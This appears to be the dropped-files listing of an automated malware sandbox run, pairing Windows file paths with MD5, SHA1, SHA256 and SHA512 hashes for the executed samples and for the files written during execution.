SHA512 c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

MD5 9727b1893f4a4adc3107a50a77813c8e
SHA1 93f76aa52461deeeb49672f7dd497cef15470186
SHA256 a5faca4539374a78a69ef31163e96a358c49014fb3e1fa413f4463b008499d51
SHA512 acf7309e548ba621e94c32b9062149670012bea2eaf280b97359f2ece6d61e7d60eabeb295c7690b42ed3c52982b317d96aa6205cb58fa44dcd553d8468751d5

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
SHA256 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa
SHA512 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b

C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe

MD5 9a84688aca96d89b149e213f6d059bfb
SHA1 043c929249d1dcbdddf4cfd278be4425f25bb644
SHA256 f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52
SHA512 c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

MD5 cd88bacf312e7e4b45258af81ce8048b
SHA1 f18cc032c483b6d94b856f7150e25f41509e59b6
SHA256 f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079
SHA512 cdc7007c2589ccc19cbbe286c8c0d5077d7118a2f7cb34bf735aff29f7e1b890bcf677ba1ef82b112ed2333a0108541a95b1c4461d8ea42fa2672b7bc7adcdd7

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

MD5 cd88bacf312e7e4b45258af81ce8048b
SHA1 f18cc032c483b6d94b856f7150e25f41509e59b6
SHA256 f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079
SHA512 cdc7007c2589ccc19cbbe286c8c0d5077d7118a2f7cb34bf735aff29f7e1b890bcf677ba1ef82b112ed2333a0108541a95b1c4461d8ea42fa2672b7bc7adcdd7

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
SHA256 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa
SHA512 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json

MD5 75a71302083de37606971fb174fc2451
SHA1 f274276bd76eee51a5fa5a1a6b233cfcf768ffcd
SHA256 fb64ee8bc1611a0ee95c475c149e603e5751758e0847bad24cc5fd0fce2198c4
SHA512 1554270d82402f0c3073d89765abb89d0d881d517e0861019c2d44a0af8cd72e7b7a3225d8cb6b4b207a77db6a0a1f335e042280fb0ef4fcb46656849ccb4984

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json

MD5 c56ff60fbd601e84edd5a0ff1010d584
SHA1 342abb130dabeacde1d8ced806d67a3aef00a749
SHA256 200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c
SHA512 acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx

MD5 5146f60c44f767730037618fc96a4587
SHA1 e6812cb8cf3b1a9a8ac5cf66e36ef3b0938ca1c2
SHA256 f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b
SHA512 feec9090d3c4c411d907a115aa72e1bddccb40acddfe6eaf80c8279d4e329c92bfee42b75746bf67ad467f3c5c23f878c1fbb83dc4afe731ae3ef2562fbd9c65

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.Settings.json

MD5 e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1 5281eae96efde7b0e16a1d977f005f0d3bd7aad0
SHA256 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31
SHA512 bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9

C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs

MD5 18a4d7b53fe2eaaf191336f70c40e7b9
SHA1 03f92cdcfb008c2799b54fc9ac9971e8773fe771
SHA256 e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120
SHA512 7da74a078d676298502984bafd0752932eacd25ca4b3312aad81254d62eaad991987503f5ea7db5ee82a3b746793213042ba2c158b269026b56bcf5d55b22ded

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 10b7e885e2eb15906dc87aa0792e105c
SHA1 10e3d27a6b0ab5cf61dad6cd36aa061674949ac4
SHA256 feb035cc54e20ef6e16d443740b4b2c486f6f0d1711df7dba1987f968201e3a2
SHA512 e538fc83d1404ad0acc372427baa0ad9eddf55c379454985304eb8df325cb97ff60196da47d4b072fd1b5337cf08bd8cc6b63341c375a3406db10be066a9a261

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 dd45f09d7950df50662233c432e7a67b
SHA1 a9a08ab552a9acc5947ac538e1c16606df717791
SHA256 ddee979f85e87f7a075484eab34db857bf60354180be48963549591335eefd9e
SHA512 e11510e94da5af2c8b82e82dc359526f1278de4127e99922de956bc501e0248915f7dafe85263d9c81695c5fdab7f4be5ea8d13cabdbdb097f8e79895d52425b

C:\Users\Admin\AppData\Local\Temp\nsi164A.tmp\klpaz.dll

MD5 0c7637f6f292ff21c50d3ab536882144
SHA1 cd913b8ece6f2577eb07bdca61a7346184eb4962
SHA256 69b6449b7cc5e34ae8f070d9ca882995248fdf80b583660fcc5a4916d78b1be2
SHA512 7919a18357e7a11d0624f6fa8dba9e119119ea28b9843b7ebd32a65f82c2bc990abfae00c778457b7f51e0310c912c0554fe64093093fba90352b9b13b511496

C:\Users\Admin\AppData\Local\Temp\nsb1D5F.tmp\mydrvjhyy.dll

MD5 71dd0c9a7ffabfca62ae8820cae0edab
SHA1 efa543dcb10eab21decf8e5c5a71f73a6790e33f
SHA256 b890a728b5ea08fa79b5ab93cfa556ab5100e1da04bd7211fc218a611d5eeb4b
SHA512 c5ff0b3ccf641cd6126a6e1a929d3e6fb927a20319daf5192e26bab75f8ebc5b989d85688f0bc624f20d9b0210a9975308f2fe0cc0d53c8570409ff1bf80f375

C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe

MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GVVED0TI\json[1].json

MD5 149c2823b7eadbfb0a82388a2ab9494f
SHA1 415fe979ce5fd0064d2557a48745a3ed1a3fbf9c
SHA256 06fa5d4e7fbfb1efdc19baa034601a894b21cf729785732853ced4bb40aca869
SHA512 f8fb6b7c93c4ab37f6e250ba8ac5c82f6e17fe52156cab81d34e91107d1da716b744bfe02ee0306497a3876d5352af789a1e66dab10e11e22065bac3050475fe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dckap5v.t3p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe

MD5 94d7d5f70d6d2ffdafb1bc5971357591
SHA1 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937
SHA256 a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5
SHA512 f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842

C:\ProgramData\yul\logs.dat

MD5 a1b6bd2a98f951e5c37e51937f98fa6b
SHA1 0579fcfef9fd54ee63182e5e6394854c90a3be22
SHA256 e70c85cdd2c9d7a208542a65c3143530747e785adeb5b3ff892c164224392b63
SHA512 e641e8b9046b85bb2400c8883c468fcd30b83e3dc5b1219472fd248c6d951d7ef86dc69a63bf120acfe872220411955a6c0d66495a18100402b4f20d3ea704cc

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\ProgramData\yul\logs.dat

MD5 b0b45f6d418596b2ab5f132e05cfb376
SHA1 961ef514cdd54d6bc110d15f52598738924d4a2a
SHA256 bfd89af438a4d3217fab60f0968b2e48a907149bde21791e3dc291de912e99dc
SHA512 1e5e3e9ca6aab7c2e8e893fd9477e8dadc254b29eb6c3ebbc604a30d2e2cabc655785b52336435fe33349fbd23957295f417ecde2d428740404ac50685a3ca3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b950ebe404eda736e529f1b0a975e8db
SHA1 4d2c020f1aa70e2bcb666a2dd144d1f3588430b8
SHA256 bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4
SHA512 6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9b62544d156bc6b7302664fd5362b679
SHA1 360c1a42f2f7d7eba5416b84c505ae4c175bd71a
SHA256 c0a28e342325c08a2a230b552a945d943acd8f964e2c5c9a0cd6994236ca361d
SHA512 18c34d1aca9339473649948edae27ec65003b7f57a5c5e3aef6af642be4066542a0344702317362da5cd08346db5b37ce7625f1de14dfe35562293f8ccae3bd9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bd5bee5b228c95f791498ec97b68bedd
SHA1 40f2ba525e44b2c255c86ce70bdba39f5055441f
SHA256 5aea469b4ca99d337284f85a8460338daa883c28a0b5a8a6ea1f67cd11ee0170
SHA512 a131d6512ec145c7ec3a5a742af5c4195f142c7b8b937c0953056f7c79f3e7ae136fbd12db4a73e0b1b2a30c0a42e682a541646d15ae2b3e40d11196f3f3fca3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e329cc2ec5712aaec3a3fde3b7a622e9
SHA1 b7df68579017ea07eafa90db5192df1de29758e4
SHA256 fbbc440416fea58389ccf4e14bfe665223dbb17c744f4d0c56e49eef751cbb5d
SHA512 945a7a769e52846d4c06cff3064479f742c2a1d329e5f046c8cb59e83f5fa135818cbb131c01868da1e29dc670115009ac7fe443045c7f47530c1fce73bb85f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ca36933e6dea7aa507a272121b34fdbb
SHA1 3b4741ca0308b345de5ecf6c3565b1dbacb0fb86
SHA256 fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d
SHA512 5a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\54f09ac1-8b24-4a8f-96d4-6acc4f9702d1.dmp

MD5 796c1a70e6f7776a60909fedc56f3a06
SHA1 ef86a3a85da5d1f9063af289f3e1b35580066544
SHA256 c7e7bcaead2c9a6ae058aa18a6575a6b6ea8ca74ba567a543d94819d7dab0b91
SHA512 9c73f1ad9e60320cd9d85b5a0604b9024be32894065c015fb5b8c438e8a49a185eb48bbd3904aaa5c89325b3cc1709ed670425b08290ea3d4384c34bea9d7a02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 68fa59d779f4eb04d362576c6fb94e2c
SHA1 d5a109ae8016acfd7bb3d65bbc341e4a49124440
SHA256 e9c61db580d4b5eafb3681cab191093f5f79658f177194b69adfb494be93f9e9
SHA512 0169107e26c1c98babd0b4b183f4c6f19963ad49746581bd17dc0da2da49c9799bfbd07330452c04c5ff13755e01a2abf22e6616441732db5ea777f2d19bdd36

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2ef51b0b-cfd8-4053-8a0b-4a347e633aea.dmp

MD5 5fd2eecf02dcf3ddf8aee535c7a1db6a
SHA1 f33a8ae0d5d702a9d514d6c94e6dab44c1e40fbc
SHA256 a0513f0d95a3ac31ee323e6ebc86be968c80ccc422809b6c5b6c2e1f215111ed
SHA512 eb3e0087a78f99f56afb9ef9a2c63f30f2e0e95024454f0d9f44fba10926503953c1520ae1683675551b4adad1d30b2ad1c1fc5ebd1bc373ad8590cc60151d64

C:\ProgramData\yul\logs.dat

MD5 2836bcba3c461e607845ae3518136579
SHA1 54d2d37cf9065da0f09b69836f6c975f396ec54e
SHA256 2b719d741defad231508d3130894c3d4ec86c2ed9deed630f60ffdab958d03b8
SHA512 27ba541a466ac7e5005d048c803b8ace84447f30a4c567f36f62db2bce3db68fe303f81b2801fded13ae691b3a3d259c7fe3b181935c1b0b0b432862afb42d93

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 bd74a3c50fd08981e89d96859e176d68
SHA1 0a98b96aefe60b96722d587b7c3aabcd15927618
SHA256 ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837
SHA512 0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e

C:\ProgramData\yul\logs.dat

MD5 b97beaf3b95f3b354a19a93bdc36bb1a
SHA1 587348dc61688a3537711d9af922527b2813b33a
SHA256 001413fa305b4830a173cdf2ff7eeb26c3615152599aad9c3d01b4011e837469
SHA512 1073b1ef95677eaeccedabcb73eaed26fa7240911bc3cd83e440bdf7a59e5b842f29fcb0e7be6a3e726ee099110d33101f8e4d05e9a2eb618e13cf8786fe0ae0